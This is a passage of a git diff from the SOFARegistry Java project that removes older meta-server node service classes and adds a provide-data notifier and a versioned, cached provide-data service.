notifyStatusConfirm(StatusConfirmRequest statusConfirmRequest); -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/MetaNodeService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/MetaNodeService.java deleted file mode 100644 index 31fd6bbe1..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/MetaNodeService.java +++ /dev/null @@ -1,30 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.node; - -import com.alipay.sofa.registry.common.model.metaserver.DataCenterNodes; -import com.alipay.sofa.registry.common.model.metaserver.GetChangeListRequest; - -/** - * - * @author shangyu.wh - * @version $Id: MetaNodeService.java, v 0.1 2018-02-12 12:08 shangyu.wh Exp $ - */ -public interface MetaNodeService extends NodeService { - - DataCenterNodes getDataCenterNodes(GetChangeListRequest getChangeListRequest); -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/NodeOperator.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/NodeOperator.java deleted file mode 100644 index 3270a531e..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/NodeOperator.java +++ /dev/null @@ -1,81 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.node; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.metaserver.DataOperator; - -import java.io.Serializable; - -/** - * - * @author shangyu.wh - * @version $Id: NodeOperator.java, v 0.1 2018-03-28 14:27 shangyu.wh Exp $ - */ -public class NodeOperator implements Serializable { - - private T node; - private DataOperator nodeOperate; - - public NodeOperator(T node, DataOperator nodeOperate) { - this.node = node; - this.nodeOperate = nodeOperate; - } - - /** - * Getter method for property node. - * - * @return property value of node - */ - public T getNode() { - return node; - } - - /** - * Setter method for property node. - * - * @param node value to be assigned to property node - */ - public void setNode(T node) { - this.node = node; - } - - /** - * Getter method for property nodeOperate. - * - * @return property value of nodeOperate - */ - public DataOperator getNodeOperate() { - return nodeOperate; - } - - /** - * Setter method for property nodeOperate. - * - * @param nodeOperate value to be assigned to property nodeOperate - */ - public void setNodeOperate(DataOperator nodeOperate) { - this.nodeOperate = nodeOperate; - } - - @Override - public String toString() { - return "NodeOperator{" + "node=" + node.getNodeUrl().getAddressString() + ", nodeOperate=" - + nodeOperate + '}'; - } - -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/NodeService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/NodeService.java deleted file mode 100644 index d96bf5116..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/NodeService.java +++ /dev/null @@ -1,29 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.node; - -import com.alipay.sofa.registry.common.model.Node.NodeType; - -/** - * - * @author shangyu.wh - * @version $Id: NodeService.java, v 0.1 2018-01-24 11:59 shangyu.wh Exp $ - */ -public interface NodeService { - - NodeType getNodeType(); -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/SessionNodeService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/SessionNodeService.java deleted file mode 100644 index 102f368a6..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/SessionNodeService.java +++ /dev/null @@ -1,38 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.node; - -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.common.model.metaserver.NotifyProvideDataChange; -import com.alipay.sofa.registry.common.model.metaserver.SessionNode; - -import java.util.Map; - -/** - * - * @author shangyu.wh - * @version $Id: SessionNodeService.java, v 0.1 2018-01-15 17:00 shangyu.wh Exp $ - */ -public interface SessionNodeService extends NodeService { - - void pushSessions(NodeChangeResult nodeChangeResult, Map targetNodes, - String confirmNodeIp); - - void pushDataNodes(NodeChangeResult nodeChangeResult); - - void notifyProvideDataChange(NotifyProvideDataChange notifyProvideDataChange); -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/impl/DataNodeServiceImpl.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/impl/DataNodeServiceImpl.java deleted file mode 100644 index d7bb82df1..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/impl/DataNodeServiceImpl.java +++ /dev/null @@ -1,200 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.node.impl; - -import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.DataCenterNodes; -import com.alipay.sofa.registry.common.model.metaserver.DataNode; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.common.model.metaserver.StatusConfirmRequest; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.remoting.exchange.RequestException; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.remoting.exchange.message.Response; -import com.alipay.sofa.registry.server.meta.bootstrap.ServiceFactory; -import com.alipay.sofa.registry.server.meta.node.DataNodeService; -import com.alipay.sofa.registry.server.meta.remoting.connection.NodeConnectManager; -import com.alipay.sofa.registry.server.meta.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.server.meta.store.StoreService; -import org.springframework.beans.factory.annotation.Autowired; - -import java.net.InetSocketAddress; -import java.util.ArrayList; -import java.util.Collection; -import java.util.List; -import java.util.Map; - -/** - * - * @author shangyu.wh - * @version $Id: DataNodeServiceImpl.java, v 0.1 2018-01-23 19:11 shangyu.wh Exp $ - */ -public class DataNodeServiceImpl implements DataNodeService { - - private static final Logger LOGGER = LoggerFactory.getLogger(DataNodeServiceImpl.class); - - @Autowired - private NodeExchanger dataNodeExchanger; - - @Autowired - private StoreService dataStoreService; - - @Autowired - private AbstractServerHandler dataConnectionHandler; - - @Override - public NodeType getNodeType() { - return NodeType.DATA; - } - - @Override - public void pushDataNodes(NodeChangeResult nodeChangeResult, Map targetNodes, - boolean confirm, String confirmNodeIp) { - - if (nodeChangeResult != null) { - - List exceptions = new ArrayList<>(); - - NodeConnectManager nodeConnectManager = getNodeConnectManager(); - - Collection connections = nodeConnectManager.getConnections(null); - - // add register confirm - StoreService storeService = ServiceFactory.getStoreService(NodeType.DATA); - DataCenterNodes dataCenterNodes = storeService.getDataCenterNodes(); - Map registeredNodes = dataCenterNodes.getNodes(); - - if (registeredNodes == null || registeredNodes.isEmpty()) { - LOGGER.error("Push dataNode list error! No data node registered!"); - throw new RuntimeException("Push dataNode list error! No data node registered!"); - } - - for (InetSocketAddress address : connections) { - try { - if (targetNodes != null && !targetNodes.isEmpty()) { - if (!targetNodes.keySet().contains(address.getAddress().getHostAddress())) { - continue; - } - } else { - if (!registeredNodes.keySet().contains( - address.getAddress().getHostAddress())) { - continue; - } - } - - Request nodeChangeRequestRequest = new Request() { - @Override - public NodeChangeResult getRequestBody() { - return nodeChangeResult; - } - - @Override - public URL getRequestUrl() { - return new URL(address); - } - }; - LOGGER.info("pushDataNodes sent url {},node type {}", address, - nodeChangeResult.getNodeType()); - Response response = dataNodeExchanger.request(nodeChangeRequestRequest); - - if (confirm) { - Object result = response.getResult(); - if (result instanceof CommonResponse) { - CommonResponse genericResponse = (CommonResponse) result; - if (genericResponse.isSuccess()) { - confirmStatus(address, confirmNodeIp); - } else { - LOGGER.error("NodeChange notify get response fail!"); - throw new RuntimeException("NodeChange notify get response fail!"); - } - } else { - LOGGER - .error("NodeChange notify has not get response or response type illegal!"); - throw new RuntimeException( - "NodeChange notify has not get response or response type illegal!"); - } - } - - } catch (RequestException e) { - LOGGER.error("Push dataNode list error! " + e.getRequestMessage(), e); - exceptions.add(e); - } catch (RuntimeException e) { - LOGGER.error("Push dataNode list runtime error! ", e); - exceptions.add(e); - } - } - if (!exceptions.isEmpty()) { - throw new RuntimeException( - "DataNodeService push dataNode list error! errors count:" + exceptions.size()); - } - } - } - - @Override - public void notifyStatusConfirm(StatusConfirmRequest statusConfirmRequest) { - try { - - NodeConnectManager nodeConnectManager = getNodeConnectManager(); - Collection connections = nodeConnectManager.getConnections(null); - - for (InetSocketAddress address : connections) { - if (address.getAddress().getHostAddress() - .equals(statusConfirmRequest.getNode().getNodeUrl().getIpAddress())) { - - Request statusConfirmRequestRequest = new Request() { - @Override - public StatusConfirmRequest getRequestBody() { - return statusConfirmRequest; - } - - @Override - public URL getRequestUrl() { - return new URL(address); - } - }; - - dataNodeExchanger.request(statusConfirmRequestRequest); - - break; - } - } - - } catch (RequestException e) { - LOGGER.error("Notify status confirm error! " + e.getRequestMessage(), e); - throw new RuntimeException("Notify status confirm error! ", e); - } - } - - private void confirmStatus(InetSocketAddress address, String confirmNodeIp) { - String ipAddress = address.getAddress().getHostAddress(); - dataStoreService.confirmNodeStatus(ipAddress, confirmNodeIp); - } - - private NodeConnectManager getNodeConnectManager() { - if (!(dataConnectionHandler instanceof NodeConnectManager)) { - LOGGER.error("dataConnectionHandler inject is not NodeConnectManager instance!"); - throw new RuntimeException( - "dataConnectionHandler inject is not NodeConnectManager instance!"); - } - - return (NodeConnectManager) dataConnectionHandler; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/impl/MetaNodeServiceImpl.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/impl/MetaNodeServiceImpl.java deleted file mode 100644 index e0aead477..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/impl/MetaNodeServiceImpl.java +++ /dev/null @@ -1,82 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.node.impl; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.DataCenterNodes; -import com.alipay.sofa.registry.common.model.metaserver.GetChangeListRequest; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.exchange.RequestException; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.remoting.exchange.message.Response; -import com.alipay.sofa.registry.server.meta.node.MetaNodeService; -import com.alipay.sofa.registry.server.meta.remoting.MetaClientExchanger; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: MetaNodeServiceImpl.java, v 0.1 2018-02-12 14:13 shangyu.wh Exp $ - */ -public class MetaNodeServiceImpl implements MetaNodeService { - - private static final Logger LOGGER = LoggerFactory.getLogger(MetaNodeServiceImpl.class); - - @Autowired - private MetaClientExchanger metaClientExchanger; - - @Override - public DataCenterNodes getDataCenterNodes(GetChangeListRequest getChangeListRequest) { - try { - Request changeListRequest = new Request() { - - @Override - public GetChangeListRequest getRequestBody() { - return getChangeListRequest; - } - - @Override - public URL getRequestUrl() { - return metaClientExchanger.getDataCenterUrl(getChangeListRequest - .getDataCenterId()); - } - }; - - Response response = metaClientExchanger.request(changeListRequest); - Object result = response.getResult(); - if (result instanceof DataCenterNodes) { - return (DataCenterNodes) result; - } else { - LOGGER.error("getDataCenterNodes has not get response or response type illegal!"); - throw new RuntimeException( - "getDataCenterNodes has not get response or response type illegal!"); - } - - } catch (RequestException e) { - LOGGER.error("MetaNodeService get DataCenter Nodes error! " + e.getRequestMessage(), e); - throw new RuntimeException("MetaNodeService get DataCenter Nodes error! " - + e.getRequestMessage(), e); - } - } - - @Override - public NodeType getNodeType() { - return NodeType.META; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/impl/SessionNodeServiceImpl.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/impl/SessionNodeServiceImpl.java deleted file mode 100644 index 9e3da8ab4..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/node/impl/SessionNodeServiceImpl.java +++ /dev/null @@ -1,230 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.node.impl; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.common.model.metaserver.NotifyProvideDataChange; -import com.alipay.sofa.registry.common.model.metaserver.SessionNode; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.remoting.exchange.RequestException; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; -import com.alipay.sofa.registry.server.meta.bootstrap.ServiceFactory; -import com.alipay.sofa.registry.server.meta.node.SessionNodeService; -import com.alipay.sofa.registry.server.meta.remoting.connection.NodeConnectManager; -import com.alipay.sofa.registry.server.meta.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.server.meta.store.StoreService; -import org.springframework.beans.factory.annotation.Autowired; - -import java.net.InetSocketAddress; -import java.util.Collection; -import java.util.Map; - -/** - * - * @author shangyu.wh - * @version $Id: SessionNodeServiceImpl.java, v 0.1 2018-01-15 17:18 shangyu.wh Exp $ - */ -public class SessionNodeServiceImpl implements SessionNodeService { - - private static final Logger LOGGER = LoggerFactory.getLogger(SessionNodeServiceImpl.class); - - @Autowired - private NodeExchanger sessionNodeExchanger; - - @Autowired - private StoreService sessionStoreService; - - @Autowired - private MetaServerConfig metaServerConfig; - - @Autowired - private AbstractServerHandler sessionConnectionHandler; - - @Override - public NodeType getNodeType() { - return NodeType.SESSION; - } - - @Override - public void pushSessions(NodeChangeResult nodeChangeResult, - Map sessionNodes, String confirmNodeIp) { - - if (LOGGER.isDebugEnabled()) { - LOGGER.debug("SessionNodeServiceImpl pushSessions sessionNodes:{}", nodeChangeResult); - } - NodeConnectManager nodeConnectManager = getNodeConnectManager(); - Collection connections = nodeConnectManager.getConnections(null); - - if (connections.size() == 0) { - LOGGER.warn("there are no client connected on session server port:{}", - metaServerConfig.getSessionServerPort()); - } - - if (sessionNodes == null || sessionNodes.isEmpty()) { - LOGGER.error("Push sessionNode list error! Input sessionNodes can't be null!"); - throw new RuntimeException( - "Push sessionNode list error! Input sessionNodes can't be null!"); - } - - for (InetSocketAddress connection : connections) { - - if (!sessionNodes.keySet().contains(connection.getAddress().getHostAddress())) { - continue; - } - - try { - Request nodeChangeRequest = new Request() { - - @Override - public NodeChangeResult getRequestBody() { - return nodeChangeResult; - } - - @Override - //all connect session - public URL getRequestUrl() { - return new URL(connection); - } - }; - - sessionNodeExchanger.request(nodeChangeRequest); - - //no error confirm receive - sessionStoreService.confirmNodeStatus(connection.getAddress().getHostAddress(), - confirmNodeIp); - - } catch (RequestException e) { - LOGGER.error("Push sessionNode list error! " + e.getRequestMessage(), e); - throw new RuntimeException("SessionNodeService push sessionNode list error!"); - } - } - - } - - @Override - public void pushDataNodes(NodeChangeResult nodeChangeResult) { - - NodeConnectManager nodeConnectManager = getNodeConnectManager(); - Collection connections = nodeConnectManager.getConnections(null); - - if (connections == null || connections.isEmpty()) { - LOGGER.error("Push sessionNode list error! No session node connected!"); - throw new RuntimeException("Push sessionNode list error! No session node connected!"); - } - - // add register confirm - StoreService storeService = ServiceFactory.getStoreService(NodeType.SESSION); - Map sessionNodes = storeService.getNodes(); - - if (sessionNodes == null || sessionNodes.isEmpty()) { - LOGGER.error("Push sessionNode list error! No session node registered!"); - throw new RuntimeException("Push sessionNode list error! No session node registered!"); - } - - for (InetSocketAddress connection : connections) { - - if (!sessionNodes.keySet().contains(connection.getAddress().getHostAddress())) { - continue; - } - - try { - Request nodeChangeRequestRequest = new Request() { - - @Override - public NodeChangeResult getRequestBody() { - return nodeChangeResult; - } - - @Override - public URL getRequestUrl() { - return new URL(connection); - } - }; - - sessionNodeExchanger.request(nodeChangeRequestRequest); - - } catch (RequestException e) { - LOGGER.error("Push sessionNode list error! " + e.getRequestMessage(), e); - throw new RuntimeException("SessionNodeService push dataNode list error!"); - } - } - } - - @Override - public void notifyProvideDataChange(NotifyProvideDataChange notifyProvideDataChange) { - - NodeConnectManager nodeConnectManager = getNodeConnectManager(); - Collection connections = nodeConnectManager.getConnections(null); - - if (connections == null || connections.isEmpty()) { - LOGGER.error("Push sessionNode list error! No session node connected!"); - throw new RuntimeException("Push sessionNode list error! No session node connected!"); - } - - // add register confirm - StoreService storeService = ServiceFactory.getStoreService(NodeType.SESSION); - Map sessionNodes = storeService.getNodes(); - - if (sessionNodes == null || sessionNodes.isEmpty()) { - LOGGER.error("Push sessionNode list error! No session node registered!"); - throw new RuntimeException("Push sessionNode list error! No session node registered!"); - } - - for (InetSocketAddress connection : connections) { - - if (!sessionNodes.keySet().contains(connection.getAddress().getHostAddress())) { - continue; - } - - try { - Request request = new Request() { - - @Override - public NotifyProvideDataChange getRequestBody() { - return notifyProvideDataChange; - } - - @Override - public URL getRequestUrl() { - return new URL(connection); - } - }; - - sessionNodeExchanger.request(request); - - } catch (RequestException e) { - LOGGER.error("Notify provide data change error! " + e.getRequestMessage(), e); - throw new RuntimeException("Notify provide data change error!"); - } - } - } - - private NodeConnectManager getNodeConnectManager() { - if (!(sessionConnectionHandler instanceof NodeConnectManager)) { - LOGGER.error("sessionConnectionHandler inject is not NodeConnectManager instance!"); - throw new RuntimeException( - "sessionConnectionHandler inject is not NodeConnectManager instance!"); - } - - return (NodeConnectManager) sessionConnectionHandler; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/DefaultProvideDataNotifier.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/DefaultProvideDataNotifier.java new file mode 100644 index 000000000..67d40dc1d --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/DefaultProvideDataNotifier.java @@ -0,0 +1,69 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.provide.data; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; +import com.alipay.sofa.registry.server.meta.remoting.data.DefaultDataServerService; +import com.alipay.sofa.registry.server.meta.remoting.session.DefaultSessionServerService; +import com.google.common.annotations.VisibleForTesting; +import java.util.Set; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * @author chen.zhu + *

Dec 03, 2020 + *

Provide Data is designed for two scenerio, as below: 1. Dynamic Configs inside + * Sofa-Registry itself 2. Service Gaven (or say 'Watcher') are subscring messages through + * Session-Server + *

All above user cases stages a Config Center role by Sofa-Registry And all these infos are + * madantorily persistenced to disk So, by leveraging meta server's JRaft feature, infos are + * reliable and stable to be stored on MetaServer + */ +@Component +public class DefaultProvideDataNotifier implements ProvideDataNotifier { + + @Autowired private DefaultDataServerService defaultDataServerService; + + @Autowired private DefaultSessionServerService defaultSessionServerService; + + @Override + public void notifyProvideDataChange(ProvideDataChangeEvent event) { + Set notifyTypes = event.getNodeTypes(); + if (notifyTypes.contains(Node.NodeType.DATA)) { + defaultDataServerService.notifyProvideDataChange(event); + } + if (notifyTypes.contains(Node.NodeType.SESSION)) { + defaultSessionServerService.notifyProvideDataChange(event); + } + } + + @VisibleForTesting + DefaultProvideDataNotifier setDataServerProvideDataNotifier( + DefaultDataServerService defaultDataServerService) { + this.defaultDataServerService = defaultDataServerService; + return this; + } + + @VisibleForTesting + DefaultProvideDataNotifier setSessionServerProvideDataNotifier( + DefaultSessionServerService defaultSessionServerService) { + this.defaultSessionServerService = defaultSessionServerService; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/DefaultProvideDataService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/DefaultProvideDataService.java new file mode 100644 index 000000000..676f6ae54 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/DefaultProvideDataService.java @@ -0,0 +1,217 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.provide.data; + +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.console.PersistenceDataBuilder; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.store.api.DBResponse; +import com.alipay.sofa.registry.store.api.meta.ProvideDataRepository; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.LoopRunnable; +import java.util.Collection; +import java.util.HashMap; +import java.util.Map; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.TimeUnit; +import java.util.concurrent.locks.ReadWriteLock; +import java.util.concurrent.locks.ReentrantReadWriteLock; +import javax.annotation.PostConstruct; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author xiaojian.xj + * @version $Id: DefaultProvideDataService.java, v 0.1 2021年04月06日 16:17 xiaojian.xj Exp $ + */ +public class DefaultProvideDataService implements ProvideDataService { + + private static final Logger LOGGER = LoggerFactory.getLogger(DefaultProvideDataService.class); + + private Map provideDataCache = new ConcurrentHashMap<>(); + + private final ReadWriteLock lock = new ReentrantReadWriteLock(); + + private final ProvideDataRefresh refresher = new ProvideDataRefresh(); + + @Autowired private ProvideDataRepository provideDataRepository; + + @PostConstruct + public void init() { + ConcurrentUtils.createDaemonThread("provideData_refresh", refresher).start(); + // resume when become leader + refresher.suspend(); + } + + private final class ProvideDataRefresh extends LoopRunnable { + + @Override + public void runUnthrowable() { + provideDataRefresh(); + } + + @Override + public void waitingUnthrowable() { + ConcurrentUtils.sleepUninterruptibly(3000, TimeUnit.MILLISECONDS); + } + } + + private void provideDataRefresh() { + Collection provideDatas = provideDataRepository.getAll(); + Map newCache = new HashMap<>(); + provideDatas.stream() + .forEach(data -> newCache.put(PersistenceDataBuilder.getDataInfoId(data), data)); + + lock.writeLock().lock(); + try { + LOGGER.info( + "refresh provide data, old size: {}, new size: {}", + provideDataCache.size(), + newCache.size()); + provideDataCache = newCache; + } catch (Throwable t) { + LOGGER.error("refresh provide data error.", t); + } finally { + lock.writeLock().unlock(); + } + } + + @Override + public void becomeLeader() { + refresher.resume(); + } + + @Override + public void loseLeader() { + refresher.suspend(); + } + + /** + * save or update provideData + * + * @param persistenceData + * @return + */ + @Override + public boolean saveProvideData(PersistenceData persistenceData) { + + long expectVersion = getExpectVersion(PersistenceDataBuilder.getDataInfoId(persistenceData)); + return saveProvideData(persistenceData, expectVersion); + } + + /** + * save or update provideData with expectVersion + * + * @param persistenceData + * @return + */ + @Override + public boolean saveProvideData(PersistenceData persistenceData, long expectVersion) { + if (persistenceData.getVersion() <= expectVersion) { + LOGGER.error( + "save provide data: {} fail. new version: {} is smaller than old version: {}", + persistenceData, + persistenceData.getVersion(), + expectVersion); + return false; + } + + // save with cas + boolean success = provideDataRepository.put(persistenceData, expectVersion); + + if (success) { + lock.writeLock().lock(); + try { + // update local cache + provideDataCache.put( + PersistenceDataBuilder.getDataInfoId(persistenceData), persistenceData); + } catch (Throwable t) { + LOGGER.error("save provide data: {} error.", persistenceData, t); + return false; + } finally { + lock.writeLock().unlock(); + } + } + return success; + } + + /** + * get except version + * + * @param key + * @return + */ + private long getExpectVersion(String key) { + long expectVersion = 0; + DBResponse response = queryProvideData(key); + + if (response.getEntity() != null) { + expectVersion = response.getEntity().getVersion(); + } + return expectVersion; + } + + /** + * query provideData by key + * + * @param key + * @return + */ + @Override + public DBResponse queryProvideData(String key) { + PersistenceData data = null; + lock.readLock().lock(); + try { + data = provideDataCache.get(key); + } catch (Throwable t) { + LOGGER.error("query provide data: {} error.", key, t); + } finally { + lock.readLock().unlock(); + } + + if (data == null && !provideDataCache.containsKey(key)) { + return DBResponse.notfound().build(); + } + if (data == null) { + // not expect to visit this code; + // if happen, query from persistent and print error log; + data = provideDataRepository.get(key); + LOGGER.error("dataKey: {} not exist in cache, response from persistent: {}", key, data); + } + return data == null ? DBResponse.notfound().build() : DBResponse.ok(data).build(); + } + + @Override + public boolean removeProvideData(String key) { + long expectVersion = getExpectVersion(key); + + boolean success = provideDataRepository.remove(key, expectVersion); + + if (success) { + lock.writeLock().lock(); + try { + provideDataCache.remove(key); + } catch (Throwable t) { + LOGGER.error("remove provide data: {} error.", key, t); + return false; + } finally { + lock.writeLock().unlock(); + } + } + return success; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/ProvideDataNotifier.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/provide/data/ProvideDataNotifier.java new file mode 100644 index 